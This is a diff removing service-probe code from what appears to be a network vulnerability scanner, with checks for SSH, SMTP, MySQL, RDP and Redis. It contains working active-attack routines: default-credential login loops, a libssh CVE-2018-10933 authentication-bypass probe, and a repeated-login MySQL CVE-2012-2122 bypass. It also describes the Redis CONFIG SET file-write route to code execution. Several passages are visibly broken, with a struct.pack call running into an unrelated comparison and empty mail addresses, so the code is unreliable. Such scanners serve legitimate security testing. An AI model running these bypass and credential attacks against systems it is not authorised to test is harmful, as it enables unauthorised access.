Default credential check --- - accepted_creds = [] - - for username, password in _SSH_DEFAULT_CREDS: - try: - client = paramiko.SSHClient() - client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) - client.connect( - target, port=port, - username=username, password=password, - timeout=3, auth_timeout=3, - look_for_keys=False, allow_agent=False, - ) - accepted_creds.append(f"{username}:{password}") - client.close() - except paramiko.AuthenticationException: - continue - except Exception: - break # connection issue, stop trying - - # --- 4. Arbitrary credential acceptance test --- - random_user = f"probe_{random.randint(10000, 99999)}" - random_pass = f"rnd_{random.randint(10000, 99999)}" - try: - client = paramiko.SSHClient() - client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) - client.connect( - target, port=port, - username=random_user, password=random_pass, - timeout=3, auth_timeout=3, - look_for_keys=False, allow_agent=False, - ) - findings.append(Finding( - severity=Severity.CRITICAL, - title="SSH accepts arbitrary credentials", - description="Random credentials were accepted, indicating a dangerous misconfiguration or deceptive service.", - evidence=f"Accepted random creds {random_user}:{random_pass}", - remediation="Investigate immediately — authentication is non-functional.", - owasp_id="A07:2021", - cwe_id="CWE-287", - confidence="certain", - )) - client.close() - except paramiko.AuthenticationException: - pass - except Exception: - pass - - if accepted_creds: - result["accepted_credentials"] = accepted_creds - for cred in accepted_creds: - findings.append(Finding( - severity=Severity.CRITICAL, - title=f"SSH default credential accepted: {cred}", - description=f"The SSH server accepted a well-known default credential.", - evidence=f"Accepted credential: {cred}", - remediation="Change default passwords immediately and enforce strong credential policies.", - owasp_id="A07:2021", - cwe_id="CWE-798", - confidence="certain", - )) - - # --- 5. 
Cipher/KEX audit --- - cipher_findings, weak_labels = self._ssh_check_ciphers(target, port) - findings += cipher_findings - result["weak_algorithms"] = weak_labels - - # --- 6. CVE check on banner version --- - if result["banner"]: - ssh_lib, ssh_version = self._ssh_identify_library(result["banner"]) - if ssh_lib and ssh_version: - result["ssh_library"] = ssh_lib - result["ssh_version"] = ssh_version - findings += check_cves(ssh_lib, ssh_version) - - # --- 7. libssh auth bypass (CVE-2018-10933) --- - if ssh_lib == "libssh": - bypass = self._ssh_check_libssh_bypass(target, port) - if bypass: - findings.append(bypass) - - return probe_result(raw_data=result, findings=findings) - - # Patterns: (regex, product_name_for_cve_db) - _SSH_LIBRARY_PATTERNS = [ - (_re.compile(r'OpenSSH[_\s](\d+\.\d+(?:\.\d+)?)', _re.IGNORECASE), "openssh"), - (_re.compile(r'libssh[_\s-](\d+\.\d+(?:\.\d+)?)', _re.IGNORECASE), "libssh"), - (_re.compile(r'dropbear[_\s](\d+(?:\.\d+)*)', _re.IGNORECASE), "dropbear"), - (_re.compile(r'paramiko[_\s](\d+\.\d+(?:\.\d+)?)', _re.IGNORECASE), "paramiko"), - (_re.compile(r'Erlang[/\s](?:OTP[_/\s]*)?(\d+\.\d+(?:\.\d+)*)', _re.IGNORECASE), "erlang_ssh"), - ] - - def _ssh_identify_library(self, banner): - """Identify SSH library and version from banner string. - - Returns - ------- - tuple[str | None, str | None] - (product_name, version) — product_name matches cve_db product keys. - """ - for pattern, product in self._SSH_LIBRARY_PATTERNS: - m = pattern.search(banner) - if m: - return product, m.group(1) - return None, None - - def _ssh_check_ciphers(self, target, port): - """Audit SSH ciphers, KEX, and MACs via paramiko Transport. - - Returns - ------- - tuple[list[Finding], list[str]] - (findings, weak_algorithm_labels) — findings for probe_result, - labels for the raw-data ``weak_algorithms`` field. 
- """ - findings = [] - weak_labels = [] - _WEAK_CIPHERS = {"3des-cbc", "blowfish-cbc", "arcfour", "arcfour128", "arcfour256", - "aes128-cbc", "aes192-cbc", "aes256-cbc", "cast128-cbc"} - _WEAK_KEX = {"diffie-hellman-group1-sha1", "diffie-hellman-group14-sha1", - "diffie-hellman-group-exchange-sha1"} - - try: - transport = paramiko.Transport((target, port)) - transport.connect() - sec_opts = transport.get_security_options() - - ciphers = set(sec_opts.ciphers) if sec_opts.ciphers else set() - kex = set(sec_opts.kex) if sec_opts.kex else set() - key_types = set(sec_opts.key_types) if sec_opts.key_types else set() - - # RSA key size check — must be done before transport.close() - try: - remote_key = transport.get_remote_server_key() - if remote_key is not None and remote_key.get_name() == "ssh-rsa": - key_bits = remote_key.get_bits() - if key_bits < 2048: - findings.append(Finding( - severity=Severity.HIGH, - title=f"SSH RSA key is critically weak ({key_bits}-bit)", - description=f"The server's RSA host key is only {key_bits}-bit, which is trivially factorable.", - evidence=f"RSA key size: {key_bits} bits", - remediation="Generate a new RSA key of at least 3072 bits, or switch to Ed25519.", - owasp_id="A02:2021", - cwe_id="CWE-326", - confidence="certain", - )) - weak_labels.append(f"rsa_key: {key_bits}-bit") - elif key_bits < 3072: - findings.append(Finding( - severity=Severity.LOW, - title=f"SSH RSA key below NIST recommendation ({key_bits}-bit)", - description=f"The server's RSA host key is {key_bits}-bit. 
NIST recommends >=3072-bit after 2023.", - evidence=f"RSA key size: {key_bits} bits", - remediation="Generate a new RSA key of at least 3072 bits, or switch to Ed25519.", - owasp_id="A02:2021", - cwe_id="CWE-326", - confidence="certain", - )) - weak_labels.append(f"rsa_key: {key_bits}-bit") - except Exception: - pass - - transport.close() - - # DSA key detection - if "ssh-dss" in key_types: - findings.append(Finding( - severity=Severity.MEDIUM, - title="SSH DSA host key offered (ssh-dss)", - description="The SSH server offers DSA host keys, which are limited to 1024-bit and considered weak.", - evidence=f"Key types: {', '.join(sorted(key_types))}", - remediation="Remove DSA host keys and use Ed25519 or RSA (>=3072-bit) instead.", - owasp_id="A02:2021", - cwe_id="CWE-326", - confidence="certain", - )) - weak_labels.append("key_types: ssh-dss") - - weak_ciphers = ciphers & _WEAK_CIPHERS - weak_kex = kex & _WEAK_KEX - - if weak_ciphers: - cipher_list = ", ".join(sorted(weak_ciphers)) - findings.append(Finding( - severity=Severity.MEDIUM, - title=f"SSH weak ciphers: {cipher_list}", - description="The SSH server offers ciphers considered cryptographically weak.", - evidence=f"Weak ciphers offered: {cipher_list}", - remediation="Disable CBC-mode and RC4 ciphers in sshd_config.", - owasp_id="A02:2021", - cwe_id="CWE-326", - confidence="certain", - )) - weak_labels.append(f"ciphers: {cipher_list}") - - if weak_kex: - kex_list = ", ".join(sorted(weak_kex)) - findings.append(Finding( - severity=Severity.MEDIUM, - title=f"SSH weak key exchange: {kex_list}", - description="The SSH server offers key-exchange algorithms with known weaknesses.", - evidence=f"Weak KEX offered: {kex_list}", - remediation="Disable SHA-1 based key exchange algorithms in sshd_config.", - owasp_id="A02:2021", - cwe_id="CWE-326", - confidence="certain", - )) - weak_labels.append(f"kex: {kex_list}") - - except Exception as e: - self.P(f"SSH cipher audit failed on {target}:{port}: {e}", color='y') - - 
return findings, weak_labels - - def _ssh_check_libssh_bypass(self, target, port): - """Test CVE-2018-10933: libssh auth bypass via premature USERAUTH_SUCCESS. - - Affected versions: libssh 0.6.0–0.8.3 (fixed in 0.7.6 / 0.8.4). - The vulnerability allows a client to send SSH2_MSG_USERAUTH_SUCCESS (52) - instead of a proper auth request, and the server accepts it. - - Returns - ------- - Finding or None - """ - try: - transport = paramiko.Transport((target, port)) - transport.connect() - # SSH2_MSG_USERAUTH_SUCCESS = 52 (0x34) - msg = paramiko.Message() - msg.add_byte(b'\x34') - transport._send_message(msg) - try: - chan = transport.open_session(timeout=3) - if chan is not None: - chan.close() - transport.close() - return Finding( - severity=Severity.CRITICAL, - title="libssh auth bypass (CVE-2018-10933)", - description="Server accepted SSH2_MSG_USERAUTH_SUCCESS from client, " - "bypassing authentication entirely. Full shell access possible.", - evidence="Session channel opened after sending USERAUTH_SUCCESS.", - remediation="Upgrade libssh to >= 0.8.4 or >= 0.7.6.", - owasp_id="A07:2021", - cwe_id="CWE-287", - confidence="certain", - ) - except Exception: - pass - transport.close() - except Exception as e: - self.P(f"libssh bypass check failed on {target}:{port}: {e}", color='y') - return None - - def _service_info_smtp(self, target, port): # default port: 25 - """ - Assess SMTP service security: banner, EHLO features, STARTTLS, - authentication methods, open relay, and user enumeration. - - Checks performed (in order): - - 1. Banner grab — fingerprint MTA software and version. - 2. EHLO — enumerate server capabilities (SIZE, AUTH, STARTTLS, etc.). - 3. STARTTLS support — check for encryption. - 4. AUTH methods — detect available authentication mechanisms. - 5. Open relay test — attempt MAIL FROM / RCPT TO without auth. - 6. VRFY / EXPN — test user enumeration commands. - - Parameters - ---------- - target : str - Hostname or IP address. 
- port : int - Port being probed. - - Returns - ------- - dict - Structured findings. - """ - import smtplib - - findings = [] - result = { - "banner": None, - "server_hostname": None, - "max_message_size": None, - "auth_methods": [], - } - - # --- 1. Connect and grab banner --- - try: - smtp = smtplib.SMTP(timeout=5) - code, msg = smtp.connect(target, port) - result["banner"] = f"{code} {msg.decode(errors='replace')}" - except Exception as e: - return probe_error(target, port, "SMTP", e) - - # --- 2. EHLO — server capabilities --- - identity = getattr(self, 'scanner_identity', 'probe.redmesh.local') - ehlo_features = [] - try: - code, msg = smtp.ehlo(identity) - if code == 250: - for line in msg.decode(errors="replace").split("\n"): - feat = line.strip() - if feat: - ehlo_features.append(feat) - except Exception: - # Fallback to HELO - try: - smtp.helo(identity) - except Exception: - pass - - # Parse meaningful fields from EHLO response - for idx, feat in enumerate(ehlo_features): - upper = feat.upper() - if idx == 0 and " Hello " in feat: - # First line is the server greeting: "hostname Hello client [ip]" - result["server_hostname"] = feat.split()[0] - if upper.startswith("SIZE "): - try: - size_bytes = int(feat.split()[1]) - result["max_message_size"] = f"{size_bytes // (1024*1024)}MB" - except (ValueError, IndexError): - pass - if upper.startswith("AUTH "): - result["auth_methods"] = feat.split()[1:] - - # --- 2b. Banner timezone extraction --- - banner_text = result["banner"] or "" - _tz_match = _re.search(r'([+-]\d{4})\s*$', banner_text) - if _tz_match: - self._emit_metadata("timezone_hints", {"offset": _tz_match.group(1), "source": f"smtp:{port}"}) - - # --- 2c. Banner / hostname information disclosure --- - # Extract MTA version from banner (e.g. 
"Exim 4.97", "Postfix", "Sendmail 8.x") - version_match = _re.search( - r"(Exim|Postfix|Sendmail|Microsoft ESMTP|hMailServer|Haraka|OpenSMTPD)" - r"[\s/]*([0-9][0-9.]*)?", - banner_text, _re.IGNORECASE, - ) - if version_match: - mta = version_match.group(0).strip() - findings.append(Finding( - severity=Severity.LOW, - title=f"SMTP banner discloses MTA software: {mta} (aids CVE lookup).", - description="The SMTP banner reveals the mail transfer agent software and version.", - evidence=f"Banner: {banner_text[:120]}", - remediation="Remove or genericize the SMTP banner to hide MTA version details.", - owasp_id="A05:2021", - cwe_id="CWE-200", - confidence="certain", - )) - - # CVE check on extracted MTA version - _smtp_product_map = {'exim': 'exim', 'postfix': 'postfix', 'opensmtpd': 'opensmtpd'} - _mta_version = version_match.group(2) if version_match and version_match.group(2) else None - _mta_name = version_match.group(1).lower() if version_match else None - - # If banner lacks version (common with OpenSMTPD), try HELP command - if version_match and not _mta_version: - try: - code, msg = smtp.docmd("HELP") - help_text = msg.decode(errors="replace") if isinstance(msg, bytes) else str(msg) - _help_ver = _re.search(r'(\d+\.\d+(?:\.\d+)*(?:p\d+)?)', help_text) - if _help_ver: - _mta_version = _help_ver.group(1) - except Exception: - pass - - if _mta_name and _mta_version: - _cve_product = _smtp_product_map.get(_mta_name) - if _cve_product: - findings += check_cves(_cve_product, _mta_version) - - if result["server_hostname"]: - # Check if hostname reveals container/internal info - hostname = result["server_hostname"] - if _re.search(r"[0-9a-f]{12}", hostname): - self._emit_metadata("container_ids", {"id": hostname, "source": f"smtp:{port}"}) - findings.append(Finding( - severity=Severity.LOW, - title=f"SMTP hostname leaks container ID: {hostname} (infrastructure disclosure).", - description="The EHLO response reveals a container ID or internal hostname.", - 
evidence=f"Hostname: {hostname}", - remediation="Configure the SMTP server to use a proper FQDN instead of the container ID.", - owasp_id="A05:2021", - cwe_id="CWE-200", - confidence="firm", - )) - if _re.match(r'^[a-z0-9-]+-[a-z0-9]{8,10}$', hostname): - self._emit_metadata("container_ids", {"id": hostname, "source": f"smtp_k8s:{port}"}) - findings.append(Finding( - severity=Severity.LOW, - title=f"SMTP hostname matches Kubernetes pod name pattern: {hostname}", - description="The EHLO hostname resembles a Kubernetes pod name (deployment-replicaset-podid).", - evidence=f"Hostname: {hostname}", - remediation="Configure the SMTP server to use a proper FQDN instead of the pod name.", - owasp_id="A05:2021", - cwe_id="CWE-200", - confidence="firm", - )) - if hostname.endswith('.internal'): - self._emit_metadata("container_ids", {"id": hostname, "source": f"smtp_internal:{port}"}) - findings.append(Finding( - severity=Severity.LOW, - title=f"SMTP hostname uses cloud-internal DNS suffix: {hostname}", - description="The EHLO hostname ends with '.internal', indicating AWS/GCP internal DNS.", - evidence=f"Hostname: {hostname}", - remediation="Configure the SMTP server to use a public FQDN instead of internal DNS.", - owasp_id="A05:2021", - cwe_id="CWE-200", - confidence="firm", - )) - - # --- 3. 
STARTTLS --- - starttls_supported = any("STARTTLS" in f.upper() for f in ehlo_features) - if not starttls_supported: - try: - code, msg = smtp.docmd("STARTTLS") - if code == 220: - starttls_supported = True - except Exception: - pass - - if not starttls_supported: - findings.append(Finding( - severity=Severity.MEDIUM, - title="SMTP does not support STARTTLS (credentials sent in cleartext).", - description="The SMTP server does not offer STARTTLS, leaving credentials and mail unencrypted.", - evidence="STARTTLS not listed in EHLO features and STARTTLS command rejected.", - remediation="Enable STARTTLS support on the SMTP server.", - owasp_id="A02:2021", - cwe_id="CWE-319", - confidence="certain", - )) - - # --- 4. AUTH without credentials --- - if result["auth_methods"]: - try: - code, msg = smtp.docmd("AUTH LOGIN") - if code == 235: - findings.append(Finding( - severity=Severity.HIGH, - title="SMTP AUTH LOGIN accepted without credentials.", - description="The SMTP server accepted AUTH LOGIN without providing actual credentials.", - evidence=f"AUTH LOGIN returned code {code}.", - remediation="Fix AUTH configuration to require valid credentials.", - owasp_id="A07:2021", - cwe_id="CWE-287", - confidence="certain", - )) - except Exception: - pass - - # --- 5. 
Open relay test --- - try: - smtp.rset() - except Exception: - try: - smtp.quit() - except Exception: - pass - try: - smtp = smtplib.SMTP(target, port, timeout=5) - smtp.ehlo(identity) - except Exception: - smtp = None - - if smtp: - try: - code_from, _ = smtp.docmd(f"MAIL FROM:") - if code_from == 250: - code_rcpt, _ = smtp.docmd("RCPT TO:") - if code_rcpt == 250: - findings.append(Finding( - severity=Severity.HIGH, - title="SMTP open relay detected (accepts mail to external domains without auth).", - description="The SMTP server relays mail to external domains without authentication.", - evidence="RCPT TO: accepted (code 250).", - remediation="Configure SMTP relay restrictions to require authentication.", - owasp_id="A01:2021", - cwe_id="CWE-284", - confidence="certain", - )) - smtp.docmd("RSET") - except Exception: - pass - - # --- 6. VRFY / EXPN --- - if smtp: - for cmd_name in ("VRFY", "EXPN"): - try: - code, msg = smtp.docmd(cmd_name, "root") - if code in (250, 251, 252): - findings.append(Finding( - severity=Severity.MEDIUM, - title=f"SMTP {cmd_name} command enabled (user enumeration possible).", - description=f"The {cmd_name} command can be used to enumerate valid users on the system.", - evidence=f"{cmd_name} root returned code {code}.", - remediation=f"Disable the {cmd_name} command in the SMTP server configuration.", - owasp_id="A01:2021", - cwe_id="CWE-203", - confidence="certain", - )) - except Exception: - pass - - if smtp: - try: - smtp.quit() - except Exception: - pass - - return probe_result(raw_data=result, findings=findings) - - def _service_info_mysql(self, target, port): # default port: 3306 - """ - MySQL handshake probe: extract version, auth plugin, and check CVEs. - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - Port being probed. - - Returns - ------- - dict - Structured findings. 
- """ - findings = [] - raw = {"version": None, "auth_plugin": None} - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(3) - sock.connect((target, port)) - data = sock.recv(256) - sock.close() - - if data and len(data) > 4: - # MySQL protocol: first byte of payload is protocol version (0x0a = v10) - pkt_payload = data[4:] # skip 3-byte length + 1-byte seq - if pkt_payload and pkt_payload[0] == 0x0a: - version = pkt_payload[1:].split(b'\x00')[0].decode('utf-8', errors='ignore') - raw["version"] = version - - # Extract auth plugin name (at end of handshake after capabilities/salt) - try: - parts = pkt_payload.split(b'\x00') - if len(parts) >= 2: - last = parts[-2].decode('utf-8', errors='ignore') if parts[-1] == b'' else parts[-1].decode('utf-8', errors='ignore') - if 'mysql_native' in last or 'caching_sha2' in last or 'sha256' in last: - raw["auth_plugin"] = last - except Exception: - pass - - findings.append(Finding( - severity=Severity.LOW, - title=f"MySQL version disclosed: {version}", - description=f"MySQL {version} handshake received on {target}:{port}.", - evidence=f"version={version}, auth_plugin={raw['auth_plugin']}", - remediation="Restrict MySQL to trusted networks; consider disabling version disclosure.", - confidence="certain", - )) - - # Salt entropy check — extract 20-byte auth scramble from handshake - try: - import math - # After version null-terminated string: 4 bytes thread_id + 8 bytes salt1 - after_version = pkt_payload[1:].split(b'\x00', 1)[1] - if len(after_version) >= 12: - salt1 = after_version[4:12] # 8 bytes after thread_id - # Salt part 2: after capabilities(2)+charset(1)+status(2)+caps_upper(2)+auth_len(1)+reserved(10) - salt2 = b'' - if len(after_version) >= 31: - salt2 = after_version[31:43].rstrip(b'\x00') - full_salt = salt1 + salt2 - if len(full_salt) >= 8: - # Shannon entropy - byte_counts = {} - for b in full_salt: - byte_counts[b] = byte_counts.get(b, 0) + 1 - entropy = 0.0 - n = len(full_salt) - 
for count in byte_counts.values(): - p = count / n - if p > 0: - entropy -= p * math.log2(p) - raw["salt_entropy"] = round(entropy, 2) - if entropy < 2.0: - findings.append(Finding( - severity=Severity.HIGH, - title=f"MySQL salt entropy critically low ({entropy:.2f} bits)", - description="The authentication scramble has abnormally low entropy, " - "suggesting a non-standard or deceptive MySQL service.", - evidence=f"salt_entropy={entropy:.2f}, salt_hex={full_salt.hex()[:40]}", - remediation="Investigate this MySQL instance — authentication randomness is insufficient.", - cwe_id="CWE-330", - confidence="firm", - )) - except Exception: - pass - - # CVE check - findings += check_cves("mysql", version) - else: - raw["protocol_byte"] = pkt_payload[0] if pkt_payload else None - findings.append(Finding( - severity=Severity.INFO, - title="MySQL port open (non-standard handshake)", - description=f"Port {port} responded but protocol byte is not 0x0a.", - confidence="tentative", - )) - else: - findings.append(Finding( - severity=Severity.INFO, - title="MySQL port open (no banner)", - description=f"No handshake data received on {target}:{port}.", - confidence="tentative", - )) - except Exception as e: - return probe_error(target, port, "MySQL", e) - - return probe_result(raw_data=raw, findings=findings) - - def _service_info_mysql_creds(self, target, port): # default port: 3306 - """ - MySQL default credential testing (opt-in via active_auth feature group). - - Attempts mysql_native_password auth with a small list of default credentials. - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - Port being probed. - - Returns - ------- - dict - Structured findings. 
- """ - import hashlib - - findings = [] - raw = {"tested_credentials": 0, "accepted_credentials": []} - creds = [("root", ""), ("root", "root"), ("root", "password")] - - for username, password in creds: - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(3) - sock.connect((target, port)) - data = sock.recv(256) - - if not data or len(data) < 4: - sock.close() - continue - - pkt_payload = data[4:] - if not pkt_payload or pkt_payload[0] != 0x0a: - sock.close() - continue - - # Extract salt (scramble) from handshake - parts = pkt_payload[1:].split(b'\x00', 1) - rest = parts[1] if len(parts) > 1 else b'' - # Salt part 1: bytes 4..11 after capabilities (skip 4 bytes capabilities + 1 byte filler) - if len(rest) >= 13: - salt1 = rest[5:13] - else: - sock.close() - continue - # Salt part 2: after reserved bytes (skip 2+2+1+10 reserved = 15) - salt2 = b'' - if len(rest) >= 28: - salt2 = rest[28:40].rstrip(b'\x00') - salt = salt1 + salt2 - - # mysql_native_password auth response - if password: - sha1_pass = hashlib.sha1(password.encode()).digest() - sha1_sha1 = hashlib.sha1(sha1_pass).digest() - sha1_salt_sha1sha1 = hashlib.sha1(salt + sha1_sha1).digest() - auth_data = bytes(a ^ b for a, b in zip(sha1_pass, sha1_salt_sha1sha1)) - else: - auth_data = b'' - - # Build auth response packet - client_flags = struct.pack('= 5: - resp_type = resp[4] - if resp_type == 0x00: # OK packet - cred_str = f"{username}:{password}" if password else f"{username}:(empty)" - raw["accepted_credentials"].append(cred_str) - findings.append(Finding( - severity=Severity.CRITICAL, - title=f"MySQL default credential accepted: {cred_str}", - description=f"MySQL on {target}:{port} accepts {cred_str}.", - evidence=f"Auth response OK for {cred_str}", - remediation="Change default passwords and restrict access.", - owasp_id="A07:2021", - cwe_id="CWE-798", - confidence="certain", - )) - except Exception: - continue - - if not findings: - findings.append(Finding( - 
severity=Severity.INFO, - title="MySQL default credentials rejected", - description=f"Tested {raw['tested_credentials']} credential pairs, all rejected.", - confidence="certain", - )) - - # --- CVE-2012-2122 auth bypass test --- - # Affected: MySQL 5.1.x < 5.1.63, 5.5.x < 5.5.25, MariaDB < 5.5.23 - # Bug: memcmp return value truncation means ~1/256 chance of auth bypass - cve_bypass = self._mysql_test_cve_2012_2122(target, port) - if cve_bypass: - findings.append(cve_bypass) - raw["cve_2012_2122"] = True - - return probe_result(raw_data=raw, findings=findings) - - # Affected version ranges for CVE-2012-2122 - _MYSQL_CVE_2012_2122_RANGES = [ - ((5, 1, 0), (5, 1, 63)), # MySQL 5.1.x < 5.1.63 - ((5, 5, 0), (5, 5, 25)), # MySQL 5.5.x < 5.5.25 - ] - - def _mysql_test_cve_2012_2122(self, target, port): - """Test for MySQL CVE-2012-2122 timing-based authentication bypass. - - On affected versions, memcmp() return value is cast to char, giving - a ~1/256 chance that any password is accepted. 300 attempts gives - ~69% probability of detection. - - Returns - ------- - Finding or None - CRITICAL finding if bypass confirmed, None otherwise. 
- """ - import hashlib - - # First, connect to get version - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(3) - sock.connect((target, port)) - data = sock.recv(256) - sock.close() - except Exception: - return None - - if not data or len(data) < 5: - return None - pkt_payload = data[4:] - if not pkt_payload or pkt_payload[0] != 0x0a: - return None - - version_str = pkt_payload[1:].split(b'\x00')[0].decode('utf-8', errors='ignore') - version_tuple = tuple(int(x) for x in _re.findall(r'\d+', version_str)[:3]) - if len(version_tuple) < 3: - return None - - # Check if version is in affected range - affected = False - for low, high in self._MYSQL_CVE_2012_2122_RANGES: - if low <= version_tuple < high: - affected = True - break - if not affected: - return None - - # Attempt rapid auth with random passwords - self.P(f"MySQL {version_str} in CVE-2012-2122 range — testing auth bypass ({target}:{port})", color='y') - attempts = 300 - - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(5) - sock.connect((target, port)) - - for _ in range(attempts): - # Read handshake - data = sock.recv(512) - if not data or len(data) < 5: - break - pkt_payload = data[4:] - if not pkt_payload or pkt_payload[0] != 0x0a: - break - - # Extract salt - parts = pkt_payload[1:].split(b'\x00', 1) - rest = parts[1] if len(parts) > 1 else b'' - if len(rest) < 13: - break - salt1 = rest[5:13] - salt2 = rest[28:40].rstrip(b'\x00') if len(rest) >= 28 else b'' - salt = salt1 + salt2 - - # Auth with random password - rand_pass = random.randbytes(20) - sha1_pass = hashlib.sha1(rand_pass).digest() - sha1_sha1 = hashlib.sha1(sha1_pass).digest() - sha1_salt = hashlib.sha1(salt + sha1_sha1).digest() - auth_data = bytes(a ^ b for a, b in zip(sha1_pass, sha1_salt)) - - client_flags = struct.pack('= 5 and resp[4] == 0x00: - sock.close() - return Finding( - severity=Severity.CRITICAL, - title=f"MySQL authentication bypass confirmed (CVE-2012-2122)", - 
description=f"MySQL {version_str} on {target}:{port} accepted login with a random password " - "due to CVE-2012-2122 memcmp truncation bug. Any attacker can gain root access.", - evidence=f"Auth succeeded with random password on attempt (version {version_str})", - remediation="Upgrade MySQL to at least 5.1.63 / 5.5.25 / MariaDB 5.5.23.", - owasp_id="A07:2021", - cwe_id="CWE-305", - confidence="certain", - ) - - # If error packet, server closes connection — reconnect - if resp and len(resp) >= 5 and resp[4] == 0xFF: - sock.close() - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(3) - sock.connect((target, port)) - - sock.close() - except Exception: - pass - return None - - def _service_info_rdp(self, target, port): # default port: 3389 - """ - Verify reachability of RDP services without full negotiation. - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - Port being probed. - - Returns - ------- - dict - Structured findings. - """ - findings = [] - raw = {"banner": None} - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(2) - sock.connect((target, port)) - raw["banner"] = "RDP service open" - findings.append(Finding( - severity=Severity.INFO, - title="RDP service detected", - description=f"RDP port {port} is open on {target}, no further enumeration performed.", - evidence=f"TCP connect to {target}:{port} succeeded.", - confidence="certain", - )) - sock.close() - except Exception as e: - return probe_error(target, port, "RDP", e) - return probe_result(raw_data=raw, findings=findings) - - # SAFETY: Read-only commands only. NEVER add CONFIG SET, SLAVEOF, MODULE LOAD, EVAL, DEBUG. - def _service_info_redis(self, target, port): # default port: 6379 - """ - Deep Redis probe: auth check, version, config readability, data size, client list. - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - Port being probed. 
- - Returns - ------- - dict - Structured findings. - """ - findings, raw = [], {"version": None, "os": None, "config_writable": False} - sock = self._redis_connect(target, port) - if not sock: - return probe_error(target, port, "Redis", Exception("connection failed")) - - auth_findings = self._redis_check_auth(sock, raw) - if not auth_findings: - # NOAUTH response — requires auth, stop here - sock.close() - return probe_result( - raw_data=raw, - findings=[Finding(Severity.INFO, "Redis requires authentication", "PING returned NOAUTH.")], - ) - - findings += auth_findings - findings += self._redis_check_info(sock, raw) - findings += self._redis_check_config(sock, raw) - findings += self._redis_check_data(sock, raw) - findings += self._redis_check_clients(sock, raw) - findings += self._redis_check_persistence(sock, raw) - - # CVE check - if raw["version"]: - findings += check_cves("redis", raw["version"]) - - sock.close() - return probe_result(raw_data=raw, findings=findings) - - def _redis_connect(self, target, port): - """Open a TCP socket to Redis.""" - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(3) - sock.connect((target, port)) - return sock - except Exception as e: - self.P(f"Redis connect failed on {target}:{port}: {e}", color='y') - return None - - def _redis_cmd(self, sock, cmd): - """Send an inline Redis command and return the response string.""" - try: - sock.sendall(f"{cmd}\r\n".encode()) - data = sock.recv(4096).decode('utf-8', errors='ignore') - return data - except Exception: - return "" - - def _redis_check_auth(self, sock, raw): - """PING to check if auth is required. 
Returns findings if no auth, empty list if NOAUTH.""" - resp = self._redis_cmd(sock, "PING") - if resp.startswith("+PONG"): - return [Finding( - severity=Severity.CRITICAL, - title="Redis unauthenticated access", - description="Redis responded to PING without authentication.", - evidence=f"Response: {resp.strip()[:80]}", - remediation="Set a strong password via requirepass in redis.conf.", - owasp_id="A07:2021", - cwe_id="CWE-287", - confidence="certain", - )] - if "-NOAUTH" in resp.upper(): - return [] # signal: auth required - return [Finding( - severity=Severity.LOW, - title="Redis unusual PING response", - description=f"Unexpected response: {resp.strip()[:80]}", - confidence="tentative", - )] - - def _redis_check_info(self, sock, raw): - """Extract version and OS from INFO server.""" - findings = [] - resp = self._redis_cmd(sock, "INFO server") - if resp.startswith("-"): - return findings - uptime_seconds = None - for line in resp.split("\r\n"): - if line.startswith("redis_version:"): - raw["version"] = line.split(":", 1)[1].strip() - elif line.startswith("os:"): - raw["os"] = line.split(":", 1)[1].strip() - elif line.startswith("uptime_in_seconds:"): - try: - uptime_seconds = int(line.split(":", 1)[1].strip()) - raw["uptime_seconds"] = uptime_seconds - except (ValueError, IndexError): - pass - if raw["os"]: - self._emit_metadata("os_claims", "redis", raw["os"]) - if raw["version"]: - findings.append(Finding( - severity=Severity.LOW, - title=f"Redis version disclosed: {raw['version']}", - description=f"Redis {raw['version']} on {raw['os'] or 'unknown OS'}.", - evidence=f"version={raw['version']}, os={raw['os']}", - remediation="Restrict INFO command access or rename it.", - confidence="certain", - )) - if uptime_seconds is not None and uptime_seconds < 60: - findings.append(Finding( - severity=Severity.INFO, - title=f"Redis uptime <60s ({uptime_seconds}s) — possible container restart", - description="Very low uptime may indicate a recently restarted container 
or ephemeral instance.", - evidence=f"uptime_in_seconds={uptime_seconds}", - remediation="Investigate if the service is being automatically restarted.", - confidence="tentative", - )) - return findings - - def _redis_check_config(self, sock, raw): - """CONFIG GET dir — if accessible, it's an RCE vector.""" - findings = [] - resp = self._redis_cmd(sock, "CONFIG GET dir") - if resp.startswith("-"): - return findings # blocked, good - raw["config_writable"] = True - findings.append(Finding( - severity=Severity.CRITICAL, - title="Redis CONFIG command accessible (RCE vector)", - description="CONFIG GET is accessible, allowing attackers to write arbitrary files " - "via CONFIG SET dir / CONFIG SET dbfilename + SAVE.", - evidence=f"CONFIG GET dir response: {resp.strip()[:120]}", - remediation="Rename or disable CONFIG via rename-command in redis.conf.", - owasp_id="A05:2021", - cwe_id="CWE-94", - confidence="certain", - )) - return findings - - def _redis_check_data(self, sock, raw): - """DBSIZE — report if data is present.""" - findings = [] - resp = self._redis_cmd(sock, "DBSIZE") - if resp.startswith(":"): - try: - count = int(resp.strip().lstrip(":")) - raw["db_size"] = count - if count > 0: - findings.append(Finding( - severity=Severity.MEDIUM, - title=f"Redis database contains {count} keys", - description="Unauthenticated access to a Redis instance with live data.", - evidence=f"DBSIZE={count}", - remediation="Enable authentication and restrict network access.", - owasp_id="A01:2021", - cwe_id="CWE-284", - confidence="certain", - )) - except ValueError: - pass - return findings - - def _redis_check_clients(self, sock, raw): - """CLIENT LIST — extract connected client IPs.""" - findings = [] - resp = self._redis_cmd(sock, "CLIENT LIST") - if resp.startswith("-"): - return findings - ips = set() - for line in resp.split("\n"): - for part in line.split(): - if part.startswith("addr="): - ip_port = part.split("=", 1)[1] - ip = ip_port.rsplit(":", 1)[0] - ips.add(ip) - 
